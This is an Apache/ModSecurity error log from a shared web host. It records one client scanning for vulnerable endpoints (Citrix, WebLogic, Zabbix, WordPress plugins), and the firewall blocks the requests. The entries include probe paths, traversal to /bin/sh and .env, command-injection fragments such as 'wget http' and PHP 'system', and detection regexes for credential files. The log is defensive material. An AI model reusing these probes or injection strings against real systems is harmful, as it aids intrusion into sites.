[Tue May 26 12:51:51.083112 2026] [security2:error] [pid 461618:tid 461869] [client 23.94.40.119:60012] ModSecurity: Access denied with code 406 (phase 2). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/etc/httpd/modsecurity.d/01_asl_content.conf"] [line "64"] [id "391213"] [msg "Atomicorp.com WAF Rules: Request content type is not allowed by policy"] [data "application/vnd.citrix.requesttoken+xml"] [severity "WARNING"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/Citrix/StoreAuth/ExplicitForms/Start"] [unique_id "ahVKD1yiSlSCHr1fdr2cqgAAAP4"]
[Tue May 26 12:51:51.247293 2026] [cgid:error] [pid 461618:tid 461854] [client 23.94.40.119:60036] AH01264: stderr from /home2/svijakqj/madrasbarassociation.org.in/password_change.cgi: script not found or unable to stat, referer: https://www.madrasbarassociation.org.in.svijaykumar.in
[Tue May 26 12:51:51.720550 2026] [security2:error] [pid 461618:tid 461814] [client 23.94.40.119:60074] ModSecurity: Access denied with code 406 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "232"] [id "900331"] [msg "Joomla Com_Content SQL Injection POST"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/session_login.cgi"] [unique_id "ahVKD1yiSlSCHr1fdr2cxAAAAMc"], referer: https://www.madrasbarassociation.org.in.svijaykumar.in
[Tue May 26 12:51:51.722532 2026] [cgid:error] [pid 461618:tid 461771] [client 23.94.40.119:60076] AH01264: stderr from /home2/svijakqj/madrasbarassociation.org.in/session_login.cgi: script not found or unable to stat, referer: https://www.madrasbarassociation.org.in.svijaykumar.in
[Tue May 26 12:51:51.728876 2026] [cgid:error] [pid 461618:tid 461749] [client 23.94.40.119:60064] AH01264: stderr from /home2/svijakqj/madrasbarassociation.org.in/rpc.cgi: script not found or unable to stat, referer: https://www.madrasbarassociation.org.in.svijaykumar.in/sysinfo.cgi?xnavigation=1
[Tue May 26 12:51:51.736226 2026] [security2:error] [pid 461618:tid 461823] [client 23.94.40.119:60078] ModSecurity: Access denied with code 406 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "232"] [id "900331"] [msg "Joomla Com_Content SQL Injection POST"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/rpc.cgi"] [unique_id "ahVKD1yiSlSCHr1fdr2cyQAAANA"], referer: https://www.madrasbarassociation.org.in.svijaykumar.in/sysinfo.cgi?xnavigation=1
[Tue May 26 12:51:52.294751 2026] [cgid:error] [pid 461618:tid 461785] [client 23.94.40.119:60090] AH01264: stderr from /home2/svijakqj/madrasbarassociation.org.in/cgi-bin/protected: script not found or unable to stat
[Tue May 26 12:51:52.538183 2026] [security2:error] [pid 461618:tid 461840] [client 23.94.40.119:60098] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/.%0d./.%0d./.%0d./.%0d./bin/sh"] [unique_id "ahVKEFyiSlSCHr1fdr2c4AAAAOE"]
[Tue May 26 12:51:52.970869 2026] [security2:error] [pid 461618:tid 461775] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKEFyiSlSCHr1fdr2c5AAAAKA"]
[Tue May 26 12:51:53.160023 2026] [security2:error] [pid 461618:tid 461869] [client 157.20.138.61:54872] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKEVyiSlSCHr1fdr2c8gAAAP4"]
[Tue May 26 12:51:53.160158 2026] [security2:error] [pid 461618:tid 461869] [client 157.20.138.61:54872] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKEVyiSlSCHr1fdr2c8gAAAP4"]
[Tue May 26 12:51:53.726851 2026] [cgid:error] [pid 461618:tid 461768] [client 23.94.40.119:60128] AH01264: stderr from /home2/svijakqj/madrasbarassociation.org.in/apply_sec.cgi: script not found or unable to stat, referer: https://www.madrasbarassociation.org.in.svijaykumar.in
[Tue May 26 12:51:53.846102 2026] [security2:error] [pid 461618:tid 461756] [client 23.94.40.119:60140] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/visualizer/readme.txt"] [unique_id "ahVKEVyiSlSCHr1fdr2dCwAAAI0"]
[Tue May 26 12:51:53.983317 2026] [security2:error] [pid 461618:tid 461861] [client 23.94.40.119:60150] ModSecurity: Access denied with code 406 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "232"] [id "900331"] [msg "Joomla Com_Content SQL Injection POST"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/apply_sec.cgi"] [unique_id "ahVKEVyiSlSCHr1fdr2dDgAAAPY"], referer: https://www.madrasbarassociation.org.in.svijaykumar.in/login_pic.asp
[Tue May 26 12:51:54.241085 2026] [cgid:error] [pid 461618:tid 461777] [client 23.94.40.119:60158] AH01264: stderr from /home2/svijakqj/madrasbarassociation.org.in/apply_sec.cgi: script not found or unable to stat, referer: https://www.madrasbarassociation.org.in.svijaykumar.in/login_pic.asp
[Tue May 26 12:51:56.755747 2026] [security2:error] [pid 461618:tid 461817] [client 195.2.71.225:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVKFFyiSlSCHr1fdr2dZAAAAMo"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1218096&moderation-hash=0a6cece0db833b873f7e0b1eaf6b5863
[Tue May 26 12:51:56.824550 2026] [security2:error] [pid 461618:tid 461784] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKFFyiSlSCHr1fdr2dXAAAAKk"]
[Tue May 26 12:51:57.600315 2026] [security2:error] [pid 461618:tid 461774] [client 195.2.71.225:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVKFVyiSlSCHr1fdr2dhwAAAJ8"], referer: https://anujtradingco.com/top-deejay-headphones/?unapproved=1218096&moderation-hash=0a6cece0db833b873f7e0b1eaf6b5863
[Tue May 26 12:51:58.678487 2026] [security2:error] [pid 461618:tid 461830] [client 23.94.40.119:33432] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-admin/admin.php"] [unique_id "ahVKFlyiSlSCHr1fdr2dpwAAANc"]
[Tue May 26 12:51:58.872168 2026] [security2:error] [pid 461618:tid 461875] [client 23.94.40.119:33458] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/zabbix/zabbix.php"] [unique_id "ahVKFlyiSlSCHr1fdr2dqwAAAQQ"]
[Tue May 26 12:51:58.873047 2026] [security2:error] [pid 461618:tid 461778] [client 23.94.40.119:33446] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/zabbix.php"] [unique_id "ahVKFlyiSlSCHr1fdr2drAAAAKM"]
[Tue May 26 12:51:59.260567 2026] [security2:error] [pid 461618:tid 461802] [client 23.94.40.119:33492] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/getcfg.php"] [unique_id "ahVKF1yiSlSCHr1fdr2dywAAALs"]
[Tue May 26 12:51:59.261059 2026] [security2:error] [pid 461618:tid 461858] [client 23.94.40.119:33502] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at ARGS:name. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "198"] [id "340007"] [rev "47"] [msg "Atomicorp.com WAF Rules: Generic Path Recursion denied"] [data "/../,ARGS:name"] [severity "CRITICAL"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/jnoj/web/polygon/problem/viewfile"] [unique_id "ahVKF1yiSlSCHr1fdr2dygAAAPM"]
[Tue May 26 12:51:59.704584 2026] [security2:error] [pid 461618:tid 461838] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVKF1yiSlSCHr1fdr2d3QAAAN8"], referer: https://www.anujtradingco.com/
[Tue May 26 12:51:59.743300 2026] [security2:error] [pid 461618:tid 461866] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKF1yiSlSCHr1fdr2dzQAAAPs"]
[Tue May 26 12:52:00.200273 2026] [security2:error] [pid 461618:tid 461801] [client 74.119.118.27:50040] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.samayikprasanga.in"] [uri "/robots.txt"] [unique_id "ahVKGFyiSlSCHr1fdr2eDAAAALo"]
[Tue May 26 12:52:00.452977 2026] [security2:error] [pid 461618:tid 461846] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVKGFyiSlSCHr1fdr2eFgAAAOc"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1157062&moderation-hash=c23f0f591a039229d82b3f206724dd57
[Tue May 26 12:52:00.646335 2026] [security2:error] [pid 461618:tid 461766] [client 74.119.118.15:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.samayikprasanga.in"] [uri "/robots.txt"] [unique_id "ahVKGFyiSlSCHr1fdr2eIgAAAJc"]
[Tue May 26 12:52:00.646973 2026] [security2:error] [pid 461618:tid 461819] [client 74.119.118.15:2640] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.samayikprasanga.in"] [uri "/robots.txt"] [unique_id "ahVKGFyiSlSCHr1fdr2eIAAAAMw"]
[Tue May 26 12:52:00.833363 2026] [core:error] [pid 461618:tid 461813] [client 23.94.40.119:33536] AH10244: invalid URI path (/3EFh8KsdVozT94vh3rwXZddOvFM/../../ThinVnc.ini)
[Tue May 26 12:52:00.846943 2026] [security2:error] [pid 461618:tid 461832] [client 74.119.118.51:27817] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.samayikprasanga.in"] [uri "/"] [unique_id "ahVKGFyiSlSCHr1fdr2eRAAAANk"]
[Tue May 26 12:52:00.876890 2026] [security2:error] [pid 461618:tid 461835] [client 74.119.118.24:41155] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.samayikprasanga.in"] [uri "/"] [unique_id "ahVKGFyiSlSCHr1fdr2eSgAAANw"]
[Tue May 26 12:52:01.071917 2026] [security2:error] [pid 461618:tid 461833] [client 74.119.118.24:56356] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.samayikprasanga.in"] [uri "/"] [unique_id "ahVKGVyiSlSCHr1fdr2eTwAAANo"]
[Tue May 26 12:52:01.100443 2026] [security2:error] [pid 461618:tid 461752] [client 74.119.118.26:15804] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.samayikprasanga.in"] [uri "/"] [unique_id "ahVKGVyiSlSCHr1fdr2eUQAAAIk"]
[Tue May 26 12:52:01.331028 2026] [cgid:error] [pid 461618:tid 461778] [client 23.94.40.119:33576] AH01264: stderr from /home2/svijakqj/madrasbarassociation.org.in/cgi-bin/up.cgi: script not found or unable to stat
[Tue May 26 12:52:01.429833 2026] [security2:error] [pid 461618:tid 461874] [client 23.94.40.119:33580] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/boafrm/formSysCmd"] [unique_id "ahVKGVyiSlSCHr1fdr2eZgAAAQM"]
[Tue May 26 12:52:01.970269 2026] [security2:error] [pid 461618:tid 461807] [client 23.94.40.119:33598] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/dashboard/uploadID.php"] [unique_id "ahVKGVyiSlSCHr1fdr2eiQAAAMA"]
[Tue May 26 12:52:02.033747 2026] [security2:error] [pid 461618:tid 461832] [client 23.94.40.119:33612] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/pandora_console/index.php"] [unique_id "ahVKGlyiSlSCHr1fdr2eigAAANk"]
[Tue May 26 12:52:02.523397 2026] [fcgid:warn] [pid 461618:tid 461812] (70014)End of file found: [client 23.94.40.119:59908] mod_fcgid: can't get data from http client
[Tue May 26 12:52:02.527569 2026] [fcgid:warn] [pid 461618:tid 461794] (70014)End of file found: [client 23.94.40.119:59918] mod_fcgid: can't get data from http client
[Tue May 26 12:52:02.708463 2026] [security2:error] [pid 461618:tid 461815] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKGlyiSlSCHr1fdr2emAAAAMg"]
[Tue May 26 12:52:02.755268 2026] [security2:error] [pid 461618:tid 461767] [client 23.94.40.119:33636] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVKGlyiSlSCHr1fdr2etgAAAJg"]
[Tue May 26 12:52:02.756489 2026] [security2:error] [pid 461618:tid 461801] [client 23.94.40.119:33620] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/pandora_console/index.php"] [unique_id "ahVKGlyiSlSCHr1fdr2etwAAALo"]
[Tue May 26 12:52:03.363296 2026] [security2:error] [pid 461618:tid 461851] [client 23.94.40.119:33642] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/woocommerce-abandoned-cart/readme.txt"] [unique_id "ahVKG1yiSlSCHr1fdr2fAgAAAOw"]
[Tue May 26 12:52:03.805119 2026] [security2:error] [pid 461618:tid 461760] [client 157.20.138.61:55234] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKG1yiSlSCHr1fdr2fBgAAAJE"]
[Tue May 26 12:52:03.805277 2026] [security2:error] [pid 461618:tid 461760] [client 157.20.138.61:55234] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKG1yiSlSCHr1fdr2fBgAAAJE"]
[Tue May 26 12:52:03.821293 2026] [security2:error] [pid 461618:tid 461633] [remote 62.93.179.166:54115] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cagmedya.com"] [uri "/.env"] [unique_id "ahVKG1yiSlSCHr1fdr2fDQAA2g4"]
[Tue May 26 12:52:04.027333 2026] [security2:error] [pid 461618:tid 461750] [client 23.94.40.119:33650] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ahVKHFyiSlSCHr1fdr2fEQAAAIc"]
[Tue May 26 12:52:04.070409 2026] [security2:error] [pid 461618:tid 461866] [client 23.94.40.119:33662] ModSecurity: Access denied with code 406 (phase 2). Match of "rx (?:/count\\\\.cgi|^/magento/index\\\\.php/admin/dashboard/|^/images/stories/|^/content/pdf/media/print)" against "REQUEST_URI" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "421"] [id "340014"] [rev "17"] [msg "Atomicorp.com WAF Rules: CMD injection"] [data "wget http"] [severity "CRITICAL"] [tag "Command Injection"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/Collector/storagemgmt/apply"] [unique_id "ahVKHFyiSlSCHr1fdr2fEgAAAPs"]
[Tue May 26 12:52:04.070537 2026] [security2:error] [pid 461618:tid 461866] [client 23.94.40.119:33662] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "406"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/Collector/storagemgmt/apply"] [unique_id "ahVKHFyiSlSCHr1fdr2fEgAAAPs"]
[Tue May 26 12:52:04.347132 2026] [security2:error] [pid 461618:tid 461784] [client 23.94.40.119:33668] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVKHFyiSlSCHr1fdr2fFwAAAKk"]
[Tue May 26 12:52:05.912882 2026] [security2:error] [pid 461618:tid 461831] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKHVyiSlSCHr1fdr2fNQAAANg"]
[Tue May 26 12:52:06.240120 2026] [security2:error] [pid 461618:tid 461827] [client 23.94.40.119:33686] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:include ?\\\\( ?(?:\\"|\\\\')? ?http|(?:define|fgets|move_uploaded_file|readfile|ftp_put|ftp_fget|gze?en?code|gzinflate|ftp_nb_put|bzopen|readdir|gzread|fopen|ftp_nb_f(put|get)|ftp_get|scandir|fscanf|readgzfile|fread|proc_open|fgetc|fgetss|ftp_fput|ftp_n ..." at ARGS:xml. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "840"] [id "380018"] [rev "25"] [msg "Atomicorp.com WAF Rules: Potentially malicious PHP code injection attempt"] [data "system \\x22"] [severity "CRITICAL"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/xmlpserver/convert"] [unique_id "ahVKHlyiSlSCHr1fdr2fRgAAANQ"]
[Tue May 26 12:52:07.140241 2026] [security2:error] [pid 461618:tid 461818] [client 23.94.40.119:33694] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/rest/tinymce/1/macro/preview"] [unique_id "ahVKH1yiSlSCHr1fdr2fYAAAAMs"], referer: www.madrasbarassociation.org.in.svijaykumar.in
[Tue May 26 12:52:08.877218 2026] [security2:error] [pid 461618:tid 461763] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKIFyiSlSCHr1fdr2fkQAAAJQ"]
[Tue May 26 12:52:09.367063 2026] [cgid:error] [pid 461618:tid 461829] [client 23.94.40.119:33710] AH01264: stderr from /home2/svijakqj/madrasbarassociation.org.in/cgi-bin/file_transfer.cgi: script not found or unable to stat
[Tue May 26 12:52:09.928043 2026] [security2:error] [pid 461618:tid 461752] [client 23.94.40.119:60800] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/objects/getImageMP4.php"] [unique_id "ahVKIVyiSlSCHr1fdr2fuQAAAIk"]
[Tue May 26 12:52:09.928418 2026] [security2:error] [pid 461618:tid 461825] [client 23.94.40.119:60796] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/objects/getImage.php"] [unique_id "ahVKIVyiSlSCHr1fdr2fugAAANI"]
[Tue May 26 12:52:09.928769 2026] [security2:error] [pid 461618:tid 461791] [client 23.94.40.119:60804] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/objects/getSpiritsFromVideo.php"] [unique_id "ahVKIVyiSlSCHr1fdr2fuwAAALA"]
[Tue May 26 12:52:09.941295 2026] [security2:error] [pid 461618:tid 461771] [client 23.94.40.119:60794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "^cmd$" at REQUEST_HEADERS_NAMES:cmd. [file "/opt/mod_security/hg_rules.conf"] [line "901"] [id "900073"] [msg "HTTP_CMD Header attempted"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ahVKIVyiSlSCHr1fdr2fvAAAAJw"]
[Tue May 26 12:52:10.060841 2026] [security2:error] [pid 461618:tid 461776] [client 23.94.40.119:60808] ModSecurity: Warning. Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "1439"] [id "9009999"] [msg "8 char spam"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/adxmlrpc.php"] [unique_id "ahVKIlyiSlSCHr1fdr2fwAAAAKE"]
[Tue May 26 12:52:10.094930 2026] [security2:error] [pid 461618:tid 461841] [client 23.94.40.119:60828] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/total-donations/readme.txt"] [unique_id "ahVKIlyiSlSCHr1fdr2fwQAAAOI"]
[Tue May 26 12:52:10.176649 2026] [security2:error] [pid 461618:tid 461776] [client 23.94.40.119:60808] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/adxmlrpc.php"] [unique_id "ahVKIlyiSlSCHr1fdr2fwAAAAKE"]
